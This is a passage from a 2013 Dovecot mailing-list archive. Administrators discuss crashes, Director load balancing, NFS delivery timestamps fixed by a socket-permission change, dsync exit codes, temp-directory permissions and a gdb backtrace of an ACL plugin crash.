/usr/sbin/dovecot() [0x41348a] -> /usr/sbin/dovecot() [0x413584] -> /usr/sbin/dovecot() [0x40b290] -> /usr/sbin/dovecot() [0x412bf6] -> /usr/sbin/dovecot() [0x405c9a] -> /usr/sbin/dovecot() [0x416f3d] -> /usr/sbin/dovecot() [0x4163b8] -> /usr/sbin/dovecot() [0x40bb39] -> /lib/libc.so.6(__libc_start_main+0xfd) [0x7f2bad861c8d] -> /usr/sbin/dovecot() [0x403859] Jun 05 07:58:09 dovecot: Info: Dovecot v1.2.15 starting up (core dumps disabled) -- Cordialement, *Ivan BERTHELOT* Administrateur R?seaux ICE DEVELOPMENT 16 rue Maurice Bouchor Tel : 08 21 23 03 54 http://www.ice-dev.com -------------- next part -------------- A non-text attachment was scrubbed... Name: logo-ice-dev.gif Type: image/gif Size: 3153 bytes Desc: not available URL: From joewong99 at gmail.com Wed Jun 5 09:44:33 2013 From: joewong99 at gmail.com (Joe Wong) Date: Wed, 5 Jun 2013 14:44:33 +0800 (HKT) Subject: [Dovecot] Director in v2.2.2 Message-ID: Hi, I am going to try and study Dovecot with Director in v2.2.2, would like to confirm the Director bundled there is the latest version, as I saw #define DIRECTOR_VERSION_NAME "director" #define DIRECTOR_VERSION_MAJOR 1 #define DIRECTOR_VERSION_MINOR 3 in director.h thanks, - Joe From ben at indietorrent.org Wed Jun 5 16:43:43 2013 From: ben at indietorrent.org (ben at indietorrent.org) Date: Wed, 05 Jun 2013 06:43:43 -0700 Subject: [Dovecot] 400 Bad Request response from pigeonhole.dovecot.org Message-ID: I'm attempting to access the Pigeonhole documentation but am receiving a 400 Bad Request response from http://pigeonhole.dovecot.org/ . Is this expected? If so, has the documentation moved? Thanks for any help! -Ben From rick at havokmon.com Wed Jun 5 17:02:43 2013 From: rick at havokmon.com (Rick Romero) Date: Wed, 05 Jun 2013 09:02:43 -0500 Subject: [Dovecot] Dovecot and time (again) Message-ID: <20130605090243.Horde.I38gZKUGEHYk47lt2hL8YQ1@beta.vfemail.net> I'm rehashing/reliving my issues from 2010: http://www.dovecot.org/list/dovecot/2010-October/053528.html In short, when calling deliver from vdelivermail (or procmail), and delivering via NFS to Maildir, the timestamp on the file is GMT.? If procmail or vdelivermail completely handle the email, the timestamp is CST. The server is set to CST. What's changed from the original issue?? Previously was running dovecot 1.x on FreeBSD, now 2.1.7 on Debian 7.?? I know it's a few versions behind, but this is a deliver only server, and ChangeLog doesn't show too many fixes for lda. Of course, running the command from the command line works perfectly... So where could my problem reside? Two examples: 1st via Calling from procmail: :0 * ? test -f /usr/lib/dovecot/dovecot-lda { :0w |/usr/lib/dovecot/deliver -d $EXT@$HOST } -rw-------??? 1 vpopmail? vchkpw? 87196 Jun? 5 13:43 1370439849.M812P29560.smtp101,S=87196,W=88094 2nd via Commandline: #sudo -u vpopmail cat /tmp/testmail.txt | /usr/lib/dovecot/deliver -d rick at havokmon.com -rw-------??? 1 vpopmail? vchkpw? 27740 Jun? 5 08:46 1370440001.M421646P29846.smtp101,S=27740,W=28243 I've thrown the TZ variable in the mix as well with no resolution |/usr/bin/env -i TZ=CST /usr/lib/dovecot/deliver -d $EXT@$HOST |/usr/bin/env -i TZ=America/Chicago /usr/lib/dovecot/deliver -d $EXT@$HOST I've also set import_environment = TZ , but it doesn't seem to show in dovecot -n ...? Any other thoughts? Side note - deliver behavior has changed since 1.x.? I used to be able to specifiy the HOME directory, but now deliver requires the -d parameter, so I've had to setup an Auth server where I didn't have to in the past. Am I the only one who doesn't run my servers in GMT?? I seem to only find my own posts when searching on this :) Rick From stephan at rename-it.nl Wed Jun 5 17:21:42 2013 From: stephan at rename-it.nl (Stephan Bosch) Date: Wed, 05 Jun 2013 16:21:42 +0200 Subject: [Dovecot] 400 Bad Request response from pigeonhole.dovecot.org In-Reply-To: References: Message-ID: <51AF4976.4000305@rename-it.nl> On 6/5/2013 3:43 PM, ben at indietorrent.org wrote: > I'm attempting to access the Pigeonhole documentation but am receiving a > 400 Bad Request response from http://pigeonhole.dovecot.org/ . Is this > expected? If so, has the documentation moved? > > Thanks for any help! Thanks for the notification. The admin is looking into it. Regards, Stephan. From rventura at h-st.com Wed Jun 5 18:23:55 2013 From: rventura at h-st.com (Romer Ventura) Date: Wed, 5 Jun 2013 10:23:55 -0500 Subject: [Dovecot] Load Balancing and HA In-Reply-To: <357f21a54e272af6a629ff7657eae27c@cymail.eu> References: <408_1369775960_51A51F58_408_11_1_0b5401ce5be9$9998ab30$ccca0190$@h-st.com> <51A87411.7070301@wk-serv.de> <357f21a54e272af6a629ff7657eae27c@cymail.eu> Message-ID: <8934_1370445601_51AF5721_8934_9_1_14c601ce6200$b151e760$13f5b620$@h-st.com> > On 31-05-2013 12:57, Patrick Westenberg wrote: > > Romer Ventura schrieb: > > > >> Scenario1: This should allow any to lose any of the servers and > >> clients still have access to their emails (although I am not sure how > >> the indexes would react to this and sudden disconnection) > >> > >> - 2 Dovecot Proxy servers, using a virtual IP to where the > >> clients > >> will connect to from the WAN and LAN > >> > >> - 2 Dovecot+Postfix servers with local cache > > > > Your proxy won't reconnect a user to backend B if the backend A fails. > > > But doesn't that depend on how the vitual IP is managed ie what kind of > system is behind it? > For example a simple heartbeat setup would correct this at the cost of one > machine sitting idle. > Other setups using load balancers can correct this. > > There is a better solution using the Director service of Dovecot where users > are assigned to one of several bacend machines and disconnected when idle. > Even, there is a script that monitors the health of the Director backends and > adjusts accordingly (which I haven't personally tried yet). See > http://wiki2.dovecot.org/Director > http://www.dovecot.org/list/dovecot/2010-August/051946.html Well, I am successfully using Ucarp with apache and Mysql to handle the IP handover if a host is down. I also seem to remember reading that using dovecot proxy and deliver, it can send the user to a different backend if any of them are unreachable. If this is not possible, using keepalive/ucarp (since they are simpler than heartbeat) would solve this. I try to stay away from clustering specially since XenServer cant do direct LUN to VM like VMWare can and to minimize the painful split-brain issues we would have to add a 3rd server for quorum... We don?t have a large user base, but being able to shutdown do maintenance on a server during business hours is a plus. We do have a lot of traffic for oure user base, we see around 200K emails per week.

This document and attachments may contain technical data controlled under the U.S. International Traffic in Arms Regulations (ITAR) or the Export Administration Regulations (EAR) and may not be exported to a Foreign Person, either in the U.S. or abroad, without the proper authorization by the U.S. Department of State or Department of Commerce, whichever is applicable. CONFIDENTIALITY NOTE: This electronic transmission, including all attachments, is directed in confidence solely to the person(s) to whom it is addressed, or an authorized recipient, and may not otherwise be distributed, copied or disclosed. The contents of the transmission may also be subject to intellectual property rights and such rights are expressly claimed and are not waived. If you have received this transmission in error, please notify the sender immediately by return electronic transmission and then immediately delete this transmission, including all attachments, without copying, distributing or disclosing same. The recipient should check this e-mail and any attachments for the presence of viruses. Houston Sigma Technologies L.P. accepts no liability for any damage caused by any virus transmitted by this e-mail.

From tss at iki.fi Wed Jun 5 18:28:17 2013 From: tss at iki.fi (Timo Sirainen) Date: Wed, 05 Jun 2013 18:28:17 +0300 Subject: [Dovecot] Bad exit status from dsync In-Reply-To: <20130603081159.GA11334@mushkin.tanso.net> References: <20130603081159.GA11334@mushkin.tanso.net> Message-ID: <1370446097.12826.10.camel@innu> On Mon, 2013-06-03 at 10:11 +0200, Jan-Frode Myklebust wrote: > I just tried to migrate one of my users from maildir to mdbox using > dsync. My conversion script is checking the dsync exit code to know if > the conversion goes fine or not, and surprisingly dsync returned "0" at > the same time as it gave the error: > > Error: Failed to sync mailbox .ta\ vare\ p? ... > (sorry, lost the rest of the error message) > > Changing the folder name to mUTF7 manually made it work, but I didn't > like that dsync returned success when it got this error. That breaks the > failsafe logic in my conversion script. It was a bit tricky to fix this. I added a kludge to v2.1 and a better fix to v2.2: http://hg.dovecot.org/dovecot-2.1/rev/a88aca17a92c http://hg.dovecot.org/dovecot-2.2/rev/12a0c383703e From manu at netbsd.org Wed Jun 5 18:56:36 2013 From: manu at netbsd.org (Emmanuel Dreyfus) Date: Wed, 5 Jun 2013 15:56:36 +0000 Subject: [Dovecot] partionning users among backends Message-ID: <20130605155636.GA22622@homeworld.netbsd.org> Hi I face growing load on a mailserver, and I would like to spread the load on multiple machines. I made a first attempt with dsync but got burnt with issues with mbox, therefore now I am looking for another safer approach. Partitionning users on multiple backends would address my load problem. I would have 50% of users on mail1.example.net and 50% on mail2.example.net, but I need to correctly redirect users requests, as their mail user agents only know about mail.example.net. Is dovecot able to send request to the local machine or to proxy them to another one, depending on information it would have on user mailboxes location? If it does, do we have documentation on this? -- Emmanuel Dreyfus manu at netbsd.org From bind at enas.net Wed Jun 5 19:07:08 2013 From: bind at enas.net (Urban Loesch) Date: Wed, 05 Jun 2013 18:07:08 +0200 Subject: [Dovecot] partionning users among backends In-Reply-To: <20130605155636.GA22622@homeworld.netbsd.org> References: <20130605155636.GA22622@homeworld.netbsd.org> Message-ID: <51AF622C.4060602@enas.net> Hi, > Partitionning users on multiple backends would address my load problem. > I would have 50% of users on mail1.example.net and 50% on mail2.example.net, > but I need to correctly redirect users requests, as their mail user agents > only know about mail.example.net. > > Is dovecot able to send request to the local machine or to proxy them > to another one, depending on information it would have on user mailboxes > location? If it does, do we have documentation on this? > Yes it does. You can store user backend location in mysql as we do that since 2 years now without any problems. You can start here: http://wiki2.dovecot.org/PasswordDatabase/ExtraFields/Proxy I prefer method nr. 1 "Forward the password to the remote server". Regards Urban From ben at indietorrent.org Wed Jun 5 19:31:53 2013 From: ben at indietorrent.org (ben at indietorrent.org) Date: Wed, 05 Jun 2013 09:31:53 -0700 Subject: [Dovecot] 400 Bad Request response from pigeonhole.dovecot.org In-Reply-To: <51AF4976.4000305@rename-it.nl> References: <51AF4976.4000305@rename-it.nl> Message-ID: On Wed, 05 Jun 2013 16:21:42 +0200, Stephan Bosch wrote: > On 6/5/2013 3:43 PM, ben at indietorrent.org wrote: >> I'm attempting to access the Pigeonhole documentation but am receiving a >> 400 Bad Request response from http://pigeonhole.dovecot.org/ . Is this >> expected? If so, has the documentation moved? >> >> Thanks for any help! > > Thanks for the notification. The admin is looking into it. > > Regards, > > Stephan. The domain is back online. Thanks for the prompt action! -Ben From oajara at frsf.utn.edu.ar Wed Jun 5 19:36:56 2013 From: oajara at frsf.utn.edu.ar (Oscar A. Jara) Date: Wed, 05 Jun 2013 13:36:56 -0300 Subject: [Dovecot] Error: Threading lost Message ID In-Reply-To: <8705846dda1649c7a48099f5da80d53f@frsf.utn.edu.ar> References: <8705846dda1649c7a48099f5da80d53f@frsf.utn.edu.ar> Message-ID: <84a9f139f9c4bd514d8d68b99c10505a@frsf.utn.edu.ar> Sorry, the dovecot version is 1.2.16 release 1_114.el5. Thks. --- El 05/06/2013 01:22, Oscar A. Jara escribi?: > Hello everyone, > > I have just put in production dovecot imap and pop3 in replacement of > courier in a setup of 700 accounts aprox. Dovecot release running is > 1.2.16 in a Linux CentOS 5.8. > > Seems like some accounts are having problems dealing with message > threading, as I read lines like this one in my logs: > > IMAP(some_user): Error: Threading lost Message ID > > ...and some of those accounts cannot even list the emails. I > temporarily got rid of this problem deactivating threading on those > accounts but I would like to solve it. > > I found a patch that seams to deal with this problem at > http://hg.dovecot.org/dovecot-1.2/rev/76023d59c3b2 [1] but it would be > weird > that CentOS wouldn't have release a patched version of the package. > > Am I missing something here? Thanks in advance! > > __________ Information from ESET Mail Security, version of virus > signature database 8412 (20130604) __________ > > The message was checked by ESET Mail Security. > http://www.eset.com [2] > > __________ Information from ESET Mail Security, version of virus > signature database 8412 (20130604) __________ > > The message was checked by ESET Mail Security. > http://www.eset.com [2] Links: ------ [1] http://hg.dovecot.org/dovecot-1.2/rev/76023d59c3b2 [2] http://www.eset.com __________ Information from ESET Mail Security, version of virus signature database 8415 (20130605) __________ The message was checked by ESET Mail Security. http://www.eset.com From rick at havokmon.com Wed Jun 5 19:45:01 2013 From: rick at havokmon.com (Rick Romero) Date: Wed, 05 Jun 2013 11:45:01 -0500 Subject: [Dovecot] dovecot and time Message-ID: <20130605114501.Horde.3Gl0lACLt3KPdkxODl2cBg2@beta.vfemail.net> I found something interesting via strace. lda is writing a timestamp with utime before doign the fsync, but I'm really not a C guy, so I have no idea why that's going on via procmail and not via commandline. I assume it's related to the choice of pread64 vs read. when called from commandline (working): read(0, "July 14-20, 2013\n10 courses. Bon"..., 4096) = 4096 read(0, "s bigger\nthan most realistic cyb"..., 4096) = 4096 read(0, "olina company in\nnumerous small,"..., 4096) = 4096 read(0, "on't have any way to tell you\". "..., 4096) = 4096 read(0, "rer. This version of Chrome addr"..., 4096) = 4096 read(0, "edu.\n\nDr. Johannes Ullrich is Ch"..., 4096) = 3164 read(0, "", 932) = 0 umask(0177) = 077 open("/usr/home/vpopmail/domains/havokmon.com/rick/Maildir/tmp/1370448645.M589211P14191.smtp101", O_WRONLY|O_CREAT|O_EXCL|O_TRUNC|O_LARGEFILE, 0777) = 11 umask(077) = 0177 open("/usr/home/vpopmail/domains/havokmon.com/rick/Maildir/dovecot.index.cache", O_RDWR|O_LARGEFILE) = 12 fstat64(12, {st_mode=S_IFREG|0600, st_size=1568768, ...}) = 0 mmap2(NULL, 1568768, PROT_READ, MAP_SHARED, 12, 0) = 0xb7064000 fstat64(11, {st_mode=S_IFREG|0600, st_size=0, ...}) = 0 write(11, "Return-Path: References: <20130605114501.Horde.3Gl0lACLt3KPdkxODl2cBg2@beta.vfemail.net> Message-ID: <20130605121836.Horde.1Ruey2D6JuJ5VpZAO5pdyA1@beta.vfemail.net> Quoting Rick Romero : > I found something interesting via strace.? lda is writing a timestamp > with utime before doign the fsync, but I'm really not a C guy, so I have > no idea why that's going on via procmail and not via commandline.? I > assume it's related to the choice of pread64 vs read. Got it. Working: connect(6, {sa_family=AF_FILE, path="/var/run/dovecot/config"}, 110) = 0 NonWorking: connect(6, {sa_family=AF_FILE, path="/var/run/dovecot/config"}, 110) = -1 EACCES (Permission denied) /var/run/dovecot/config was owned by root.?? I changed it to vpopmail (which procmail runs under), and my timestamps are now correct. Rick From luca.fornasari at gmail.com Wed Jun 5 20:56:17 2013 From: luca.fornasari at gmail.com (Luca Fornasari) Date: Wed, 5 Jun 2013 19:56:17 +0200 Subject: [Dovecot] Error: Threading lost Message ID In-Reply-To: <84a9f139f9c4bd514d8d68b99c10505a@frsf.utn.edu.ar> References: <8705846dda1649c7a48099f5da80d53f@frsf.utn.edu.ar> <84a9f139f9c4bd514d8d68b99c10505a@frsf.utn.edu.ar> Message-ID: On Wed, Jun 5, 2013 at 6:36 PM, Oscar A. Jara wrote: > Sorry, the dovecot version is 1.2.16 release 1_114.el5. Thks. > > --- > > El 05/06/2013 01:22, Oscar A. Jara escribi?: > > courier in a setup of 700 accounts aprox. Dovecot release running is >> 1.2.16 in a Linux CentOS 5.8.that CentOS wouldn't have release a patched >> version of the package. >> >> Am I missing something here? Thanks in advance! >> > Hi Oscar, CentOS 5.8 it's quite outdated; they are at 6.4 I have to admit I'm not aware of what Dovecot version is shipped with CentOS 6.4 but sure there is a more up to date Dovecot version. Regards, Luca From me at junc.eu Wed Jun 5 21:40:16 2013 From: me at junc.eu (Benny Pedersen) Date: Wed, 05 Jun 2013 20:40:16 +0200 Subject: [Dovecot] Crash dovecot 1.2.15 In-Reply-To: <51AEF8F3.2020709@ice-dev.com> References: <51AEF8F3.2020709@ice-dev.com> Message-ID: ib skrev den 2013-06-05 10:38: > Jun 05 06:26:01 dovecot: Warning: SIGHUP received - reloading > configuration > Jun 05 06:26:02 dovecot: Error: Raw backtrace: /usr/sbin/dovecot() > [0x41348a] -> /usr/sbin/dovecot() [0x413584] -> /usr/sbin/dovecot() > [0x40b290] -> /usr/sbin/dovecot() [0x412bf6] -> /usr/sbin/dovecot() > [0x405c9a] -> /usr/sbin/dovecot() [0x416f3d] -> /usr/sbin/dovecot() > [0x4163b8] -> /usr/sbin/dovecot() [0x40bb39] -> > /lib/libc.so.6(__libc_start_main+0xfd) [0x7f2bad861c8d] -> > /usr/sbin/dovecot() [0x403859] > Jun 05 07:58:09 dovecot: Info: Dovecot v1.2.15 starting up (core > dumps disabled) recompile dovecot, or update to later stable ?, 1.2.15 is not the latest in 1.x, and its more or less a flame war on dovecot maillist to keep 1.x running :( as i read it you have upgraded gcc/glibc, if its gentoo/funtoo, revdep-rebuild will fix it i have 1.2.16 -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From oajara at frsf.utn.edu.ar Wed Jun 5 22:10:32 2013 From: oajara at frsf.utn.edu.ar (Oscar A. Jara) Date: Wed, 05 Jun 2013 16:10:32 -0300 Subject: [Dovecot] Error: Threading lost Message ID In-Reply-To: References: <8705846dda1649c7a48099f5da80d53f@frsf.utn.edu.ar> <84a9f139f9c4bd514d8d68b99c10505a@frsf.utn.edu.ar> Message-ID: Thanks Luca. I will try with the current CentOS release. El 05/06/2013 14:56, Luca Fornasari escribi?: > On Wed, Jun 5, 2013 at 6:36 PM, Oscar A. Jara > wrote: > >> Sorry, the dovecot version is 1.2.16 release 1_114.el5. Thks. --- El >> 05/06/2013 01:22, Oscar A. Jara escribi?: courier in a setup of 700 >> accounts aprox. Dovecot release running is >> >>> 1.2.16 in a Linux CentOS 5.8.that CentOS wouldn't have release a >>> patched version of the package. Am I missing something here? Thanks >>> in advance! > > Hi Oscar, > > CentOS 5.8 it's quite outdated; they are at 6.4 > I have to admit I'm not aware of what Dovecot version is shipped with > CentOS 6.4 but sure there is a more up to date Dovecot version. > > Regards, > Luca > > __________ Information from ESET Mail Security, version of virus > signature database 8415 (20130605) __________ > > The message was checked by ESET Mail Security. > http://www.eset.com [1] Links: ------ [1] http://www.eset.com __________ Information from ESET Mail Security, version of virus signature database 8416 (20130605) __________ The message was checked by ESET Mail Security. http://www.eset.com From dovecot-user at spambox.dk Thu Jun 6 09:06:30 2013 From: dovecot-user at spambox.dk (Henrik Larsson) Date: Thu, 06 Jun 2013 08:06:30 +0200 Subject: [Dovecot] Permissions for mail_temp_dir directory Message-ID: <51B026E6.8060308@spambox.dk> I recently upgraded from 2.1.16 to 2.2.2 and started to receive the following errors: imap(henrik at example.com): Error: stat(/var/db/dovecot/dovecot.imap.mail.example.com.16128.3209d13f842955c2) failed: Permission denied imap(henrik at example.com): Error: Temp file creation to /var/db/dovecot/dovecot.imap.mail.example.com.16128. failed: Permission denied imap(henrik at example.com): Error: stat(/var/db/dovecot/dovecot.imap.mail.example.com.16501.0ddff1dc93cdbe6a) failed: Permission denied imap(henrik at example.com): Error: Temp file creation to /var/db/dovecot/dovecot.imap.mail.example.com.16501. failed: Permission denied I didn't have these before the upgrade. The current permissions for the /var/db/dovecot directory is root:wheel 755. What would be the correct permissions for the mail_temp_dir directory? doveconf -n output --cut-- # 2.2.2: /usr/local/etc/dovecot/dovecot.conf # OS: FreeBSD 8.3-RELEASE-p3 amd64 auth_mechanisms = plain login digest-md5 cram-md5 first_valid_uid = 125 hostname = mail.example.com listen = * log_path = /var/log/dovecot mail_plugins = zlib mail_privileged_group = postfix mail_temp_dir = /var/db/dovecot managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave namespace { inbox = yes location = prefix = separator = . type = private } namespace { hidden = yes inbox = no list = no location = prefix = INBOX. separator = . type = private } passdb { args = /usr/local/etc/dovecot/dovecot-sql.conf.ext driver = sql } plugin { fts = squat fts_squat = partial=4 full=10 sieve = ~/.dovecot.sieve sieve_dir = ~/sieve } postmaster_address = postmaster at example.com protocols = imap pop3 lmtp sieve service auth-worker { user = $default_internal_user } service auth { unix_listener /home/mail/postfix/private/dovecot-auth { group = postfix mode = 0660 user = postfix } } service lmtp { executable = lmtp -L unix_listener /home/mail/postfix/private/dovecot-lmtp { group = postfix mode = 0660 user = postfix } } ssl_cert = References: <519F1D62.5070700@sys4.de> <20130526153321.GA27814@daniel.localdomain> <1369782570.3886.5.camel@tardis> <46575A3A-75D8-41FB-98AA-44A5128ED640@iki.fi> <51A5BC80.3050609@thelounge.net> <51A6CA9F.1080405@sys4.de> <51A7316C.6040802@Media-Brokers.com> Message-ID: It not be because Timo not agree with thiz for switching, if one software not do what you need, you go look for one that does as other says, my manager would command that, I expect you manager also command you same. I have mail from list member who advize me of broken 1.2 version where thiz work in fallover mode, I successful using thiz version now on two server. I know version old and unsupported, but working very nice for how we need, no more timeout message or delays for user logins all week, I am very happy now. On Thu, May 30, 2013 at 9:01 PM, Charles Marcus wrote: > On 2013-05-30 2:59 AM, Nick Edwards wrote: > >> nobody makes us dovecot true, but dovecot works fine and in perfect >> harmony with postfix, except this one option. I remember the earlier thread >> and have been waiting for this option, but now I see Timo has decided to >> drop the idea after earlier saying it would be beneficial, and seems some >> people have been waiting for long time for no reason, so maybe time to >> consider all other options, including server software. >> > > Oh, grow up. > > I can see if this was something that was super critical to a functioning - > and I agree that it should be fixed to either work as expected (best), or > no longer support the ability to add multiple hosts - but it isn't up to me > or you. > > Just because 'some' people have been waiting for this feature, doesn't > mean that it is important to everyone. > > Now, if you can provide evidence that a large percentage of people desire > this feature and it is important enough to them that they might actually > consider switching from dovecot to something else (but what choices do you > have, really? I know I have no desire to switch back to courier-imap), then > I think Timo may reconsider. In fact, he may already be doing so. > > But the bottom line is, there are other ways to achieve this feature, and > I think it is plain silly and juvenile to threaten to switch from dovecot > just because Timo doesn't agree with you. > > Oh - and of course, the very last point... > > This *is* open source software. I'd wager an entire months pay that if you > coded up a solution and provided a working, properly coded patch (that > isn't full of security holes and bad coding practices), Timo would > accept/merge it. > > -- > > Best regards, > > Charles > > > From wdgarc88 at gmail.com Thu Jun 6 09:34:11 2013 From: wdgarc88 at gmail.com (Edwardo Garcia) Date: Thu, 6 Jun 2013 16:34:11 +1000 Subject: [Dovecot] Load Balancing and HA In-Reply-To: <408_1369775960_51A51F58_408_11_1_0b5401ce5be9$9998ab30$ccca0190$@h-st.com> References: <408_1369775960_51A51F58_408_11_1_0b5401ce5be9$9998ab30$ccca0190$@h-st.com> Message-ID: We tried one time software solution, not very reliable under load, we move to coyotepoint equalizer hardware load balancer, very good cost and excellent reliable On Wed, May 29, 2013 at 7:23 AM, Romer Ventura wrote: > Hello, > > > > I've been thinking about the best way to achieve load balancing and making > my mail servers highly available. So far I believe I have 2 scenarios: > > Scenario1: This should allow any to lose any of the servers and clients > still have access to their emails (although I am not sure how the indexes > would react to this and sudden disconnection) > > - 2 Dovecot Proxy servers, using a virtual IP to where the clients > will connect to from the WAN and LAN > > - 2 Dovecot+Postfix servers with local cache > > - 2 NFS servers and synced with dsync (mirror, 1 server writes to > its own NFS and changes synced to the other via dsync) > > > > Scenario2: Pretty much as above on the back end. However, with this there > is > no way to load balance users. > > - 2 Dovecot+Postfix server with local cache > > - 2 NFS servers synced with dsync > > - Make use of DNS MX record priority to provide access to > secondary > email server > > > > > > Anyone care to comment? > > > > Thanks. > > >
>
>

This document and attachments may contain technical data > controlled under the U.S. International Traffic in Arms Regulations (ITAR) > or the Export Administration Regulations (EAR) and may not be exported to a > Foreign Person, either in the U.S. or abroad, without the proper > authorization by the U.S. Department of State or Department of Commerce, > whichever is applicable. > CONFIDENTIALITY NOTE: This electronic transmission, including all > attachments, is directed in confidence solely to the person(s) to whom it > is addressed, or an authorized recipient, and may not otherwise be > distributed, copied or disclosed. The contents of the transmission may also > be subject to intellectual property rights and such rights are expressly > claimed and are not waived. If you have received this transmission in > error, please notify the sender immediately by return electronic > transmission and then immediately delete this transmission, including all > attachments, without copying, distributing or disclosing same. The > recipient should check this e-mail and any attachments for the presence of > viruses. Houston Sigma Technologies L.P. accepts no liability for any > damage caused by any virus transmitted by this e-mail.

> > From nmilas at noa.gr Thu Jun 6 10:28:15 2013 From: nmilas at noa.gr (Nikolaos Milas) Date: Thu, 06 Jun 2013 10:28:15 +0300 Subject: [Dovecot] Load Balancing and HA In-Reply-To: References: <408_1369775960_51A51F58_408_11_1_0b5401ce5be9$9998ab30$ccca0190$@h-st.com> Message-ID: <51B03A0F.7070809@noa.gr> On 6/6/2013 9:34 ??, Edwardo Garcia wrote: > We tried one time software solution, not very reliable under load Could you please provide some details of that software solution setup? Thanks, Nick From rs at sys4.de Thu Jun 6 10:38:19 2013 From: rs at sys4.de (Robert Schetterer) Date: Thu, 06 Jun 2013 09:38:19 +0200 Subject: [Dovecot] Load Balancing and HA In-Reply-To: <51B03A0F.7070809@noa.gr> References: <408_1369775960_51A51F58_408_11_1_0b5401ce5be9$9998ab30$ccca0190$@h-st.com> <51B03A0F.7070809@noa.gr> Message-ID: <51B03C6B.9040404@sys4.de> Am 06.06.2013 09:28, schrieb Nikolaos Milas: > On 6/6/2013 9:34 ??, Edwardo Garcia wrote: > >> We tried one time software solution, not very reliable under load > > Could you please provide some details of that software solution setup? > > Thanks, > Nick for loadbalancing keepalived is easy to setup, and working nice here for imap/pop3/smtp/http including ssl versions study i.e http://www.hbyconsultancy.com/blog/two-nodes-load-balance-and-failover-with-keepalived-and-ubuntu-server-10-04-x64.html http://www.keepalived.org/LVS-NAT-Keepalived-HOWTO.html couldnt get better links fast, search more youreself , you dont need to use it with nat Best Regards MfG Robert Schetterer -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein From AxelLuttgens at swing.be Thu Jun 6 21:51:29 2013 From: AxelLuttgens at swing.be (Axel Luttgens) Date: Thu, 6 Jun 2013 20:51:29 +0200 Subject: [Dovecot] Dovecot 2.2.2: doveadm user doesn't honor -x option Message-ID: <016CDD6F-ACA9-431D-920B-E29BD8DF2FD2@swing.be> Hello, 1. Considering a user_query similar to this one: SELECT ... FROM ... WHERE CASE '%s' WHEN 'lmtp' THEN ... and issuing following command: doveadm user -x service=lmtp someuser at example.com the log shows: SELECT ... FROM ... WHERE CASE 'doveadm' WHEN 'lmtp' THEN ... and the query of course fails. The same config with Dovecot 2.1.16 yields expected results. 2. This is more a question. Issuing above command first writes this to the log: prefetch(someuser at example.com): passdb didn't return userdb entries, trying the next userdb Is there really an attempt to make use of the prefetch database? If yes, under which circumstances could it succeed? TIA, Axel From tlx at leuxner.net Fri Jun 7 10:02:55 2013 From: tlx at leuxner.net (Thomas Leuxner) Date: Fri, 7 Jun 2013 09:02:55 +0200 Subject: [Dovecot] v2.2.2 (e5bd0a7c6a1e) Core Dump Message-ID: <20130607070255.GA2491@nihlus.leuxner.net> (gdb) bt full #0 mailbox_list_default_get_vname (list=0x21ceec0, storage_name=0x0) at mailbox-list.c:655 __s2_len = i = prefix_len = name_len = vname = 0x0 list_sep = ns_sep = ret = #1 0x00007fecd7cf4585 in acl_backend_vfile_get_local_dir (name=0x0, name at entry=0x7fecd7cfada8 "", backend=) at acl-backend-vfile.c:147 ns = 0x21ca6d0 list = 0x21ceec0 storage = type = dir = inbox = vname = error = 0x221a100 "\320\"\035\002" #2 0x00007fecd7cf470e in acl_backend_vfile_object_init (_backend=0x21d22d0, name=0x7fecd7cfada8 "") at acl-backend-vfile.c:195 _data_stack_cur_id = 6 backend = 0x21d22d0 aclobj = 0x221a100 dir = vname = #3 0x00007fecd7cf3c8e in acl_backend_get_default_object (backend=backend at entry=0x21d22d0) at acl-backend.c:177 user = 0x21caeb0 ns = 0x21ca6d0 default_name = #4 0x00007fecd7cf3cce in acl_backend_get_default_rights (backend=0x21d22d0, mask_r=mask_r at entry=0x7fffc5835d78) at acl-backend.c:184 aclobj = #5 0x00007fecd7cf9c51 in acl_mailbox_try_list_fast (ctx=0x221b4b0) at acl-mailbox-list.c:107 alist = 0x21cf1a8 nonowner_list_ctx = ret = backend = idxp = 0x21cf278 acl_mask = 0x0 ns = 0x21ca6d0 update_ctx = {iter_ctx = 0x1, tree_ctx = 0x7fecd90aa548, glob = 0x6, leaf_flags = 35726664, parent_flags = 0, update_only = 0, match_parents = 0} name = #6 acl_mailbox_list_iter_init (list=0x21ceec0, patterns=0x21d92f8, flags=49152) at acl-mailbox-list.c:194 _data_stack_cur_id = 5 alist = 0x21cf1a8 ctx = 0x221b4b0 pool = p = i = inboxcase = #7 0x00007fecd8c0c09d in mailbox_list_iter_init_multiple (list=0x21ceec0, patterns=, flags=49152) at mailbox-list-iter.c:173 ctx = ret = 0 #8 0x00007fecd8c0d35b in mailbox_list_ns_iter_try_next (info_r=, _ctx=0x21d9020) at mailbox-list-iter.c:574 ctx = 0x21d9020 info = errstr = has_children = ns = error = 4294967295 #9 mailbox_list_ns_iter_next (_ctx=0x21d9020) at mailbox-list-iter.c:645 info = #10 0x00007fecd8c0bd17 in mailbox_list_iter_next_call (ctx=ctx at entry=0x21d9020) at mailbox-list-iter.c:941 info = set = #11 0x00007fecd8c0c9a8 in mailbox_list_iter_next (ctx=0x21d9020) at mailbox-list-iter.c:1012 _data_stack_cur_id = 4 info = #12 0x000000000040f209 in cmd_list_continue (cmd=cmd at entry=0x21ddf40) at cmd-list.c:229 ctx = 0x21de188 info = flags = str = 0x21af518 mutf7_name = 0x21af668 name = ret = #13 0x000000000040fa4f in cmd_list_full (cmd=0x21ddf40, lsub=) at cmd-list.c:463 client = args = 0x21bab18 list_args = 0x21ddf40 arg_count = ctx = 0x21de188 patterns = {arr = {buffer = 0x21de1c8, element_size = 8}, v = 0x21de1c8, v_modifiable = 0x21de1c8} ref = 0x21de1b8 "" pattern = 0x21de1c0 "%" patterns_strarr = 0x21de200 str = #14 0x000000000041675c in command_exec (cmd=cmd at entry=0x21ddf40) at imap-commands.c:156 hook = 0x21b8d90 ret = #15 0x00000000004157c0 in client_command_input (cmd=0x21ddf40) at imap-client.c:775 client = 0x21dd360 command = __FUNCTION__ = "client_command_input" #16 0x000000000041587a in client_command_input 